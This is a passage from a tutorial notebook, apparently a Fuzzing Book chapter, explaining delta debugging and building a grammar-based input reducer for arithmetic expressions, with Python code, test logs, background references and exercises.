"A reduced test case such as the one above has many advantages:\n\n* A reduced test case __reduces the _cognitive load_ of the programmer__. The test case is shorter and focused, and thus does not burden the programmer with irrelevant details. A reduced input typically leads to shorter executions and smaller program states, both of which reduce the search space as it comes to understanding the bug. In our case, we have eliminated lots of irrelevant input – only the two characters the reduced input contains are relevant.\n\n* A reduced test case __is easier to communicate__. All one needs here is the summary: `MysteryRunner fails on \"()\"`, which is much better than `MysteryRunner fails on a 4100-character input (attached)`.\n\n* A reduced test case helps in __identifying duplicates__. If similar bugs have been reported already, and all of them have been reduced to the same cause (namely that the input contains matching parentheses), then it becomes obvious that all these bugs are different symptoms of the same underlying cause – and would all be resolved at once with one code fix.",
"_____no_output_____"
],
[
"How effective is delta debugging? In the best case (when the left half or the right half fails), the number of tests is logarithmic proportional to the length $n$ of an input (i.e., $O(\\log_2 n)$); this is the same complexity as binary search. In the worst case, though, delta debugging can require a number of tests proportional to $n^2$ (i.e., $O(n^2)$) – this happens in the case when we are down to character granularity, and we have to repeatedly tried to delete all characters, only to find that deleting the last character results in a failure \\cite{Zeller2002}. (This is a pretty pathological situation, though.)",
"_____no_output_____"
],
[
"In general, delta debugging is a robust algorithm that is easy to implement, easy to deploy, and easy to use – provided that the underlying test case is deterministic and runs quickly enough to warrant a number of experiments. As these are the same prerequisites that make fuzzing effective, delta debugging makes an excellent companion to fuzzing.",
"_____no_output_____"
],
[
"## Grammar-Based Input Reduction\n\nIf the input language is syntactically complex, delta debugging may take several attempts at reduction, and may not be able to reduce inputs at all. In the second half of this chapter, we thus introduce an algorithm named _Grammar-Based Reduction_ (or GRABR for short) that makes use of _grammars_ to reduce syntactically complex inputs.",
"_____no_output_____"
],
[
"### Lexical Reduction vs. Syntactic Rules\n\nDespite its general robustness, there are situations in which delta debugging might be inefficient or outright fail. As an example, consider some _expression input_ such as `1 + (2 * 3)`. Delta debugging requires a number of tests to simplify the failure-inducing input, but it eventually returns a minimal input",
"_____no_output_____"
]
],
[
[
"expr_input = \"1 + (2 * 3)\"\ndd_reducer = DeltaDebuggingReducer(mystery, log_test=True)\ndd_reducer.reduce(expr_input)",
"Test #1 '1 + (2 * 3)' 11 FAIL\nTest #2 '2 * 3)' 6 PASS\nTest #3 '1 + (' 5 PASS\nTest #4 '+ (2 * 3)' 9 FAIL\nTest #5 '+ ( 3)' 6 FAIL\nTest #6 ' 3)' 3 PASS\nTest #7 '+ (' 3 PASS\nTest #8 ' ( 3)' 5 FAIL\nTest #9 '( 3)' 4 FAIL\nTest #10 '3)' 2 PASS\nTest #11 '( ' 2 PASS\nTest #12 '(3)' 3 FAIL\nTest #13 '()' 2 FAIL\nTest #14 ')' 1 PASS\nTest #15 '(' 1 PASS\n"
]
],
[
[
"Looking at the tests, above, though, only few of them actually represent syntactically valid arithmetic expressions. In a practical setting, we may want to test a program which actually _parses_ such expressions, and which would _reject_ all invalid inputs. We define a class `EvalMysteryRunner` which first _parses_ the given input (according to the rules of our expression grammar), and _only_ if it fits would it be passed to our original `MysteryRunner`. This simulates a setting in which we test an expression interpreter, and in which only valid inputs can trigger the bug.",
"_____no_output_____"
]
],
[
[
"from Grammars import EXPR_GRAMMAR",
"_____no_output_____"
],
[
"from Parser import EarleyParser # minor dependency",
"_____no_output_____"
],
[
"class EvalMysteryRunner(MysteryRunner):\n def __init__(self):\n self.parser = EarleyParser(EXPR_GRAMMAR)\n\n def run(self, inp):\n try:\n tree, *_ = self.parser.parse(inp)\n except SyntaxError as exc:\n return (inp, Runner.UNRESOLVED)\n\n return super().run(inp)",
"_____no_output_____"
],
[
"eval_mystery = EvalMysteryRunner()",
"_____no_output_____"
]
],
[
[
"Under these circumstances, it turns out that delta debugging utterly fails. None of the reductions it applies yield a syntactically valid input, so the input as a whole remains as complex as it was before.",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(eval_mystery, log_test=True)\ndd_reducer.reduce(expr_input)",
"Test #1 '1 + (2 * 3)' 11 FAIL\nTest #2 '2 * 3)' 6 UNRESOLVED\nTest #3 '1 + (' 5 UNRESOLVED\nTest #4 '+ (2 * 3)' 9 UNRESOLVED\nTest #5 '1 2 * 3)' 8 UNRESOLVED\nTest #6 '1 + ( 3)' 8 UNRESOLVED\nTest #7 '1 + (2 *' 8 UNRESOLVED\nTest #8 ' + (2 * 3)' 10 UNRESOLVED\nTest #9 '1+ (2 * 3)' 10 UNRESOLVED\nTest #10 '1 (2 * 3)' 9 UNRESOLVED\nTest #11 '1 + 2 * 3)' 10 UNRESOLVED\nTest #12 '1 + ( * 3)' 10 UNRESOLVED\nTest #13 '1 + (2 3)' 9 UNRESOLVED\nTest #14 '1 + (2 *3)' 10 UNRESOLVED\nTest #15 '1 + (2 * ' 9 UNRESOLVED\nTest #16 '1 (2 * 3)' 10 UNRESOLVED\nTest #17 '1 +(2 * 3)' 10 UNRESOLVED\nTest #18 '1 + (2* 3)' 10 UNRESOLVED\nTest #19 '1 + (2 3)' 10 UNRESOLVED\nTest #20 '1 + (2 * )' 10 UNRESOLVED\nTest #21 '1 + (2 * 3' 10 UNRESOLVED\n"
]
],
[
[
"This behavior is possible if the program under test has several constraints regarding input validity. Delta debugging is not aware of these constraints (nor of the input structure in general), so it might violate these constraints again and again.",
"_____no_output_____"
],
[
"### A Grammmar-Based Reduction Approach\n\nTo reduce inputs with high syntactical complexity, we use another approach: Rather than reducing the input string, we reduce the _tree_ representing its structure. The general idea is to start with a _derivation tree_ coming from parsing the input, and then _substitute subtrees by smaller subtrees of the same type_. These alternate subtrees can either come\n\n1. From the tree itself, or\n2. By applying an alternate grammar expansion using elements from the tree.",
"_____no_output_____"
],
[
"Let us show these two strategies using an example. We start with a derivation tree from an arithmetic expression:",
"_____no_output_____"
]
],
[
[
"from GrammarFuzzer import all_terminals, expansion_to_children, display_tree",
"_____no_output_____"
],
[
"derivation_tree, *_ = EarleyParser(EXPR_GRAMMAR).parse(expr_input)\ndisplay_tree(derivation_tree)",
"_____no_output_____"
]
],
[
[
"### Simplifying by Replacing Subtrees",
"_____no_output_____"
],
[
"To simplify this tree, we could replace any `<expr>` symbol up in the tree with some `<expr>` subtree down in the tree. For instance, we could replace the uppermost `<expr>` with its right `<expr>` subtree, yielding the string `(2 + 3)`:",
"_____no_output_____"
]
],
[
[
"import copy",
"_____no_output_____"
],
[
"new_derivation_tree = copy.deepcopy(derivation_tree)\n# We really should have some query language\nsub_expr_tree = new_derivation_tree[1][0][1][2]\ndisplay_tree(sub_expr_tree)",
"_____no_output_____"
],
[
"new_derivation_tree[1][0] = sub_expr_tree\ndisplay_tree(new_derivation_tree)",
"_____no_output_____"
],
[
"all_terminals(new_derivation_tree)",
"_____no_output_____"
]
],
[
[
"Replacing one subtree by another only works as long as individual elements such as `<expr>` occur multiple times in our tree. In the reduced `new_derivation_tree`, above, we could replace further `<expr>` trees only once more.",
"_____no_output_____"
],
[
"### Simplifying by Alternative Expansions",
"_____no_output_____"
],
[
"A second means to simplify this tree is to apply _alternative expansions_. That is, for a symbol, we check whether there is an alternative expansion with a smaller number of children. Then, we replace the symbol with the alternative expansion, filling in needed symbols from the tree.",
"_____no_output_____"
],
[
"As an example, consider the `new_derivation_tree` above. The applied expansion for `<term>` has been\n\n <term> ::= <term> * <factor>\n \nLet us replace this with the alternative expansion:\n\n <term> ::= <factor>",
"_____no_output_____"
]
],
[
[
"term_tree = new_derivation_tree[1][0][1][0][1][0][1][1][1][0]\ndisplay_tree(term_tree)",
"_____no_output_____"
],
[
"shorter_term_tree = term_tree[1][2]\ndisplay_tree(shorter_term_tree)",
"_____no_output_____"
],
[
"new_derivation_tree[1][0][1][0][1][0][1][1][1][0] = shorter_term_tree\ndisplay_tree(new_derivation_tree)",
"_____no_output_____"
],
[
"all_terminals(new_derivation_tree)",
"_____no_output_____"
]
],
[
[
"If we replace derivation subtrees by (smaller) subtrees, and if we search for alternate expansions that again yield smaller subtrees, we can systematically simplify the input. This could be much faster than delta debugging, as our inputs would always be syntactically valid. However, we need a strategy for when to apply which simplification rule. This is what we develop in the remainder of this section.",
"_____no_output_____"
],
[
"### A Class for Reducing with Grammars\n\nWe introduce the `GrammarReducer` class, which is again a `Reducer`. Note that we derive from `CachingReducer`, as the strategy will produce several duplicates.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(CachingReducer):\n def __init__(self, runner, parser, log_test=False, log_reduce=False):\n super().__init__(runner, log_test=log_test)\n self.parser = parser\n self.grammar = parser.grammar()\n self.start_symbol = parser.start_symbol()\n self.log_reduce = log_reduce\n self.try_all_combinations = False",
"_____no_output_____"
]
],
[
[
"### A Few Helpers\n\nWe define a number of helper functions, which we will need for our strategy. `tree_list_to_string()` does what the name suggest, creating a string from a list of derivation trees:",
"_____no_output_____"
]
],
[
[
"def tree_list_to_string(q):\n return \"[\" + \", \".join([all_terminals(tree) for tree in q]) + \"]\"",
"_____no_output_____"
],
[
"tree_list_to_string([derivation_tree, derivation_tree])",
"_____no_output_____"
]
],
[
[
"The function `possible_combinations()` takes a list of lists $[[x_1, x_2], [y_1, y_2], \\dots]$ and creates a list of combinations $[[x_1, y_1], [x_1, y_2], [x_2, y_1], [x_2, y_2], \\dots]$.",
"_____no_output_____"
]
],
[
[
"def possible_combinations(list_of_lists):\n if len(list_of_lists) == 0:\n return []\n\n ret = []\n for e in list_of_lists[0]:\n if len(list_of_lists) == 1:\n ret.append([e])\n else:\n for c in possible_combinations(list_of_lists[1:]):\n new_combo = [e] + c\n ret.append(new_combo)\n return ret",
"_____no_output_____"
],
[
"possible_combinations([[1, 2], ['a', 'b']])",
"_____no_output_____"
]
],
[
[
"The functions `number_of_nodes()` and `max_height()` return the number of nodes and the maximum height of the given tree, respectively.",
"_____no_output_____"
]
],
[
[
"def number_of_nodes(tree):\n (symbol, children) = tree\n return 1 + sum([number_of_nodes(c) for c in children])",
"_____no_output_____"
],
[
"number_of_nodes(derivation_tree)",
"_____no_output_____"
],
[
"def max_height(tree):\n (symbol, children) = tree\n if len(children) == 0:\n return 1\n return 1 + max([max_height(c) for c in children])",
"_____no_output_____"
],
[
"max_height(derivation_tree)",
"_____no_output_____"
]
],
[
[
"### Simplification Strategies\n\nLet us now implement our two simplification strategies – replacing subtrees and alternate expansions.",
"_____no_output_____"
],
[
"#### Finding Subtrees\n\nThe method `subtrees_with_symbol()` returns all subtrees in the given tree which's root is equal to the given symbol. If `ignore_root` is set (default), then the root node of `tree` is not compared against. (The `depth` parameter will be discussed below.)",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def subtrees_with_symbol(self, tree, symbol, depth=-1, ignore_root=True):\n # Find all subtrees in TREE whose root is SYMBOL.\n # If IGNORE_ROOT is true, ignore the root note of TREE.\n\n ret = []\n (child_symbol, children) = tree\n if depth <= 0 and not ignore_root and child_symbol == symbol:\n ret.append(tree)\n\n # Search across all children\n if depth != 0 and children is not None:\n for c in children:\n ret += self.subtrees_with_symbol(c,\n symbol,\n depth=depth - 1,\n ignore_root=False)\n\n return ret",
"_____no_output_____"
]
],
[
[
"Here's an example: These are all subtrees with `<term>` in our derivation tree `derivation_tree`.",
"_____no_output_____"
]
],
[
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
],
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\")]",
"_____no_output_____"
]
],
[
[
"If we want to replace `<term>` subtrees to simplify the tree, these are the subtrees we could replace them with.",
"_____no_output_____"
],
[
"#### Alternate Expansions",
"_____no_output_____"
],
[
"Our second strategy, simplifying by alternate expansions, is a bit more complex. We first fetch the possible expansions for the given symbol (starting with the ones with the fewest children). For each expansion, we fill in values for the symbols from the subtree (using `subtrees_with_symbols()`, above). We then pick the first possible combination (or _all_ combinations, if the attribute `try_all_combinations` is set).",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def alternate_reductions(self, tree, symbol, depth=-1):\n reductions = []\n\n expansions = self.grammar.get(symbol, [])\n expansions.sort(\n key=lambda expansion: len(\n expansion_to_children(expansion)))\n\n for expansion in expansions:\n expansion_children = expansion_to_children(expansion)\n\n match = True\n new_children_reductions = []\n for (alt_symbol, _) in expansion_children:\n child_reductions = self.subtrees_with_symbol(\n tree, alt_symbol, depth=depth)\n if len(child_reductions) == 0:\n match = False # Child not found; cannot apply rule\n break\n\n new_children_reductions.append(child_reductions)\n\n if not match:\n continue # Try next alternative\n\n # Use the first suitable combination\n for new_children in possible_combinations(new_children_reductions):\n new_tree = (symbol, new_children)\n if number_of_nodes(new_tree) < number_of_nodes(tree):\n reductions.append(new_tree)\n if not self.try_all_combinations:\n break\n\n # Sort by number of nodes\n reductions.sort(key=number_of_nodes)\n\n return reductions",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
]
],
[
[
"Here are _all_ combinations for `<term>`:",
"_____no_output_____"
]
],
[
[
"grammar_reducer.try_all_combinations = True\nprint([all_terminals(t)\n for t in grammar_reducer.alternate_reductions(derivation_tree, \"<term>\")])",
"['1', '2', '3', '1 * 1', '1 * 3', '2 * 1', '2 * 3', '3 * 1', '3 * 3', '(2 * 3)', '1 * 2 * 3', '2 * 2 * 3', '3 * 2 * 3', '1 * (2 * 3)', '(2 * 3) * 1', '(2 * 3) * 3', '2 * (2 * 3)', '3 * (2 * 3)']\n"
]
],
[
[
"The default, though, is simply to return the first of these:",
"_____no_output_____"
]
],
[
[
"grammar_reducer.try_all_combinations = False\n[all_terminals(t) for t in grammar_reducer.alternate_reductions(\n derivation_tree, \"<term>\")]",
"_____no_output_____"
]
],
[
[
"#### Both Strategies Together",
"_____no_output_____"
],
[
"Let us now merge both strategies. To replace a subtree with a given symbol, we first search for already existing subtrees (using `subtrees_with_symbol()`); then we go for alternate expansions (using `alternate_expansions()`).",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def symbol_reductions(self, tree, symbol, depth=-1):\n \"\"\"Find all expansion alternatives for the given symbol\"\"\"\n reductions = (self.subtrees_with_symbol(tree, symbol, depth=depth)\n + self.alternate_reductions(tree, symbol, depth=depth))\n\n # Filter duplicates\n unique_reductions = []\n for r in reductions:\n if r not in unique_reductions:\n unique_reductions.append(r)\n\n return unique_reductions",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
]
],
[
[
"These are the possible reductions for `<expr>` nodes. Note how we first return subtrees (`1 + (2 * 3)`, `(2 * 3)`, `2 * 3`) before going for alternate expansions of `<expr>` (`1`).",
"_____no_output_____"
]
],
[
[
"reductions = grammar_reducer.symbol_reductions(derivation_tree, \"<expr>\")\ntree_list_to_string([r for r in reductions])",
"_____no_output_____"
]
],
[
[
"These are the possible reductions for `<term>` nodes. Again, we first have subtrees of the derivation tree, followed by the alternate expansion `1 * 1`.",
"_____no_output_____"
]
],
[
[
"reductions = grammar_reducer.symbol_reductions(derivation_tree, \"<term>\")\ntree_list_to_string([r for r in reductions])",
"_____no_output_____"
]
],
[
[
"### The Reduction Strategy\n\nWe are now able to return a number of alternatives for each symbol in the tree. This is what we apply in the core function of our reduction strategy, `reduce_subtree()`. Starting with `subtree`, for every child, we find possible reductions. For every reduction, we replace the child with the reduction and test the resulting (full) tree. If it fails, our reduction was successful; otherwise, we put the child back into place and try out the next reduction. Eventually, we apply `reduce_subtree()` on all children, reducing these as well.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_subtree(self, tree, subtree, depth=-1):\n symbol, children = subtree\n if len(children) == 0:\n return False\n\n if self.log_reduce:\n print(\"Reducing\", all_terminals(subtree), \"with depth\", depth)\n\n reduced = False\n while True:\n reduced_child = False\n for i, child in enumerate(children):\n (child_symbol, _) = child\n for reduction in self.symbol_reductions(\n child, child_symbol, depth):\n if number_of_nodes(reduction) >= number_of_nodes(child):\n continue\n\n # Try this reduction\n if self.log_reduce:\n print(\n \"Replacing\",\n all_terminals(\n children[i]),\n \"by\",\n all_terminals(reduction))\n children[i] = reduction\n if self.test(all_terminals(tree)) == Runner.FAIL:\n # Success\n if self.log_reduce:\n print(\"New tree:\", all_terminals(tree))\n reduced = reduced_child = True\n break\n else:\n # Didn't work out - restore\n children[i] = child\n\n if not reduced_child:\n if self.log_reduce:\n print(\"Tried all alternatives for\", all_terminals(subtree))\n break\n\n # Run recursively\n for c in children:\n if self.reduce_subtree(tree, c, depth):\n reduced = True\n\n return reduced",
"_____no_output_____"
]
],
[
[
"All we now need is a few drivers. The method `reduce_tree()` is the main entry point into `reduce_subtree()`:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_tree(self, tree):\n return self.reduce_subtree(tree, tree)",
"_____no_output_____"
]
],
[
[
"The custom method `parse()` turns a given input into a derivation tree:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def parse(self, inp):\n tree, *_ = self.parser.parse(inp)\n if self.log_reduce:\n print(all_terminals(tree))\n return tree",
"_____no_output_____"
]
],
[
[
"The method `reduce()` is the one single entry point, parsing the input and then reducing it.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce(self, inp):\n tree = self.parse(inp)\n self.reduce_tree(tree)\n return all_terminals(tree)",
"_____no_output_____"
]
],
[
[
"Let us try this out in practice on our input `expr_input` and the `mystery()` function. How quickly can we reduce it?",
"_____no_output_____"
]
],
[
[
"expr_input",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n eval_mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_test=True)\ngrammar_reducer.reduce(expr_input)",
"Test #1 '(2 * 3)' 7 FAIL\nTest #2 '2 * 3' 5 PASS\nTest #3 '3' 1 PASS\nTest #4 '2' 1 PASS\nTest #5 '(3)' 3 FAIL\n"
]
],
[
[
"Success! In only five steps, our `GrammarReducer` reduces the input to the minimum that causes the failure. Note how all tests are syntactically valid by construction, avoiding the `UNRESOLVED` outcomes that cause delta debugging to stall.",
"_____no_output_____"
],
[
"### A Depth-Oriented Strategy",
"_____no_output_____"
],
[
"Even if five steps are already good, we can still do better. If we look at the log above, we see that after test `#2`, where the input (tree) is reduced to `2 * 3`, our `GrammarReducer` first tries to replace the tree with `2` and `3`, which are the alternate `<term>` subtrees. This may work, of course; but if there are many possible subtrees, our strategy will spend quite some time trying one after the other.",
"_____no_output_____"
],
[
"Delta debugging, as introduced above, follows the idea of trying to cut inputs approximately in half, and thus quickly proceeds towards a minimal input. By replacing a tree with much smaller subtrees, we _could_ possibly reduce a tree significantly, but may need several attempts to do so. A better strategy is to only consider _large_ subtrees first – both for the subtree replacement as well as for alternate expansions. To find such _large_ subtrees, we limit the _depth_ by which we search for possible replacements in the subtree – first, by looking at the direct descendants, later at lower descendants.",
"_____no_output_____"
],
[
"This is the role of the `depth` parameter used in `subtrees_with_symbol()` and passed through the invoking functions. If set, _only_ symbols at the given depth are returned. Here's an example, starting again with our derivation tree `derivation_tree`:",
"_____no_output_____"
]
],
[
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
],
[
"display_tree(derivation_tree)",
"_____no_output_____"
]
],
[
[
"At a depth of 1, there is no `<term>` symbol:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=1)]",
"_____no_output_____"
]
],
[
[
"At a depth of 2, we have the `<term>` subtree on the left hand side:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=2)]",
"_____no_output_____"
]
],
[
[
"At a depth of 3, we have the `<term>` subtree on the right hand side:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=3)]",
"_____no_output_____"
]
],
[
[
"The idea is now to start with a depth of 0, subsequently increasing it as we proceed:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_tree(self, tree):\n depth = 0\n while depth < max_height(tree):\n reduced = self.reduce_subtree(tree, tree, depth)\n if reduced:\n depth = 0 # Start with new tree\n else:\n depth += 1 # Extend search for subtrees\n return tree ",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_test=True)\ngrammar_reducer.reduce(expr_input)",
"Test #1 '(2 * 3)' 7 FAIL\nTest #2 '(3)' 3 FAIL\nTest #3 '3' 1 PASS\n"
]
],
[
[
"We see that a depth-oriented strategy needs even fewer steps in our setting.",
"_____no_output_____"
],
[
"### Comparing Strategies\n\nWe close by demonstrating the difference between text-based delta debugging and our grammar-based reduction. We build a very long expression:",
"_____no_output_____"
]
],
[
[
"from GrammarFuzzer import GrammarFuzzer",
"_____no_output_____"
],
[
"long_expr_input = GrammarFuzzer(EXPR_GRAMMAR, min_nonterminals=100).fuzz()\nlong_expr_input",
"_____no_output_____"
]
],
[
[
"With grammars, we need only a handful of tests to find the failure-inducing input:",
"_____no_output_____"
]
],
[
[
"from Timer import Timer",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(eval_mystery, EarleyParser(EXPR_GRAMMAR))\nwith Timer() as grammar_time:\n print(grammar_reducer.reduce(long_expr_input))",
"(9)\n"
],
[
"grammar_reducer.tests",
"_____no_output_____"
],
[
"grammar_time.elapsed_time()",
"_____no_output_____"
]
],
[
[
"Delta debugging, in contrast, requires orders of magnitude more tests (and consequently, time). Again, the reduction is not closely as perfect as it is with the grammar-based reducer.",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(eval_mystery)\nwith Timer() as dd_time:\n print(dd_reducer.reduce(long_expr_input))",
"((2 - 1 - 2) * 8 + (5) - (4)) / ((2) * 3) * (9) / 3 / 1 - 8\n"
],
[
"dd_reducer.tests",
"_____no_output_____"
],
[
"dd_time.elapsed_time()",
"_____no_output_____"
]
],
[
[
"We see that if an input is syntactically complex, using a grammar to reduce inputs is the best way to go.",
"_____no_output_____"
],
[
"## Synopsis\n\nA _reducer_ takes a failure-inducing input and reduces it to the minimum that still reproduces the failure. This chapter provides `Reducer` classes that implement such reducers.",
"_____no_output_____"
],
[
"Here is a simple example: An arithmetic expression causes an error in the Python interpreter:",
"_____no_output_____"
]
],
[
[
"!python -c 'x = 1 + 2 * 3 / 0'",
"Traceback (most recent call last):\r\n File \"<string>\", line 1, in <module>\r\nZeroDivisionError: division by zero\r\n"
]
],
[
[
"Can we reduce this input to a minimum? To use a `Reducer`, one first has to build a `Runner` whose outcome is `FAIL` if the precise error occurs. We therefore build a `ZeroDivisionRunner` whose `run()` method will specifically return a `FAIL` outcome if a `ZeroDivisionError` occurs.",
"_____no_output_____"
]
],
[
[
"from Fuzzer import ProgramRunner",
"_____no_output_____"
],
[
"class ZeroDivisionRunner(ProgramRunner):\n \"\"\"Make outcome 'FAIL' if ZeroDivisionError occurs\"\"\"\n def run(self, inp=\"\"):\n result, outcome = super().run(inp)\n if result.stderr.find('ZeroDivisionError') >= 0:\n outcome = 'FAIL'\n return result, outcome",
"_____no_output_____"
]
],
[
[
"If we feed this expression into a `ZeroDivisionRunner`, it will produce an outcome of `FAIL` as designed.",
"_____no_output_____"
]
],
[
[
"python_input = \"x = 1 + 2 * 3 / 0\"\npython_runner = ZeroDivisionRunner(\"python\")\nresult, outcome = python_runner.run(python_input)\noutcome",
"_____no_output_____"
]
],
[
[
"Delta Debugging is a simple and robust reduction algorithm. We can tie a `DeltaDebuggingReducer` to this runner, and have it determine the substring that causes the `python` program to fail:",
"_____no_output_____"
]
],
[
[
"dd = DeltaDebuggingReducer(python_runner)\ndd.reduce(python_input)",
"_____no_output_____"
]
],
[
[
"The input is reduced to the maximum: We get the essence of the division by zero.",
"_____no_output_____"
],
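[
"For syntactically complex inputs, the `GrammarReducer` from this chapter can be used instead. Here is a minimal sketch, assuming the failure is already triggered by the arithmetic part alone (which `EXPR_GRAMMAR` can parse) and assuming a hypothetical `expr_runner` that evaluates its input and returns `FAIL` on a `ZeroDivisionError`:\n\n```python\ngrammar_reducer = GrammarReducer(expr_runner, EarleyParser(EXPR_GRAMMAR))\ngrammar_reducer.reduce(\"1 + 2 * 3 / 0\")  # would reduce towards something like '3 / 0'\n```",
"_____no_output_____"
],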
[
"## Lessons Learned\n\n* Reducing failure-inducing inputs to a minimum is helpful for testing and debugging.\n* _Delta debugging_ is a simple and robust algorithm to easily reduce test cases.\n* For syntactically complex inputs, _grammar-based reduction_ is much faster and yields better results.",
"_____no_output_____"
],
[
"## Next Steps\n\nOur next chapter focuses on [Web GUI Fuzzing](WebFuzzer.ipynb), another domain where generating and reducing test cases is central.",
"_____no_output_____"
],
[
"## Background\n\nThe \"lexical\" delta debugging algorithm discussed here stems from \\cite{Zeller2002}; actually, this is the exact Python implementation as used by Zeller in 2002. The idea of systematically reducing inputs has been discovered a number of times, although not as automatic and generic as delta debugging. \\cite{Slutz1998}, for instance, discusses systematic reduction of SQL statements for SQL databases; the general process as manual work is well described by \\cite{Kernighan1999}.",
"_____no_output_____"
],
[
"The deficits of delta debugging as it comes to syntactically complex inputs were first discussed in *compiler testing*, and _reducing tree inputs_ rather than string inputs was quickly discovered as an alternative. *Hierarchical Delta Debugging* (*HDD*) \\cite{Misherghi2006} applies delta debugging on subtrees of a parse tree, systematically reducing a parse tree to a minimum. _Generalized Tree Reduction_ \\cite{Herfert2017} generalizes this idea to apply arbitrary _patterns_ such as replacing a term by a compatible term in a subtree, as `subtrees_with_symbol()` does. Using _grammars_ to reduce inputs was first implemented in the _Perses_ tool \\cite{Sun2018}; our algorithm implements very similar strategies. Searching for alternate expansions (as `alternate_reductions()`) is a contribution of the present chapter.",
"_____no_output_____"
],
[
"While `GrammarReducer` is a generic approach that can be parameterized with an arbitrary grammar, _language-specific_ approaches can do a much better job for the language at hand. *C-Reduce* \\cite{Regehr2012} is a reducer specifically targeting the reduction of programming languages. Besides reductions in the style of delta debugging or tree transformations, C-Reduce comes with more than 30 source-to-source transformations that replace aggregates by scalars, remove function parameters at a definition and all call sites, change functions to return `void` and deleting all `return` statements, and many more. While specifically instantiated for the C language (and used for testing C compilers), these principles extend to arbitrary programming languages following an ALGOL-like syntax. When testing a compiler, C-Reduce is the tool to go for.",
"_____no_output_____"
],
[
"This [blog post](https://www.drmaciver.com/2019/01/notes-on-test-case-reduction/) by David McIver contains lots of insights on how to apply reduction in practice, in particular multiple runs with different abstraction levels.",
"_____no_output_____"
],
[
"## Exercises\n\nHow to best reduce inputs is still an underdeveloped field of research, with lots of opportunities.",
"_____no_output_____"
],
[
"### Exercise 1: Mutation-Based Fuzzing with Reduction\n\nWhen fuzzing with a population, it can be useful to occasionally _reduce_ the length of each element, such that future descendants are shorter, too, which typically speeds up their testing.\n\nConsider the `MutationFuzzer` class from [the chapter on mutation-based fuzzing](MutationFuzzer.ipynb). \nExtend it such that whenever a new input is added to the population, it is first reduced using delta debugging.",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
],
[
"### Exercise 2: Reduction by Production\n\nGrammar-based input reduction, as sketched above, might be a good algorithm, but is by no means the only alternative. One interesting question is whether \"reduction\" should only be limited to elements already present, or whether one would be allowed to also create _new_ elements. These would not be present in the original input, yet still allow to produce a much smaller input that would still reproduce the original failure.",
"_____no_output_____"
],
[
"As an example, consider the following grammar:\n\n```\n<number> ::= <float> | <integer> | <not-a-number>\n<float> ::= <digits>.<digits>\n<integer> ::= <digits>\n<not-a-number> ::= NaN\n<digits> ::= [0-9]+\n```\n\nAssume the input `100.99` fails. We might be able to reduce it to a minimum of, say, `1.9`. However, we cannot reduce it to an `<integer>` or to `<not-a-number>`, as these symbols do not occur in the original input. By allowing to _create_ alternatives for these symbols, we could also tests inputs such as `1` or `NaN` and further generalize the class of inputs for which the program fails.",
"_____no_output_____"
],
[
"Create a class `GenerativeGrammarReducer` as subclass of `GrammarReducer`; extend the method `reduce_subtree()` accordingly.",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
],
[
"### Exercise 3: The Big Reduction Shoot-Out\n\nCreate a _benchmark_ for the grammars already defined earlier, consisting of:\n\n1. A set of _inputs_, produced from these very grammars using `GrammarFuzzer` and derivatives;\n2. A set of _tests_ which check for the occurrence of individual symbols as well as pairs and triples of these symbols:\n * Tests should be _unresolved_ if the input is not syntactically valid;\n * Tests should _fail_ if the symbols (or pairs or triples thereof) occur;\n * Tests should _pass_ in all other cases.\n \nCompare delta debugging and grammar-based debugging on the benchmark. Implement HDD \\cite{Misherghi2006} and _Generalized Tree Reduction_ \\cite{Herfert2017} and add them to your comparison. Which approach performs best, and under which circumstances?",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
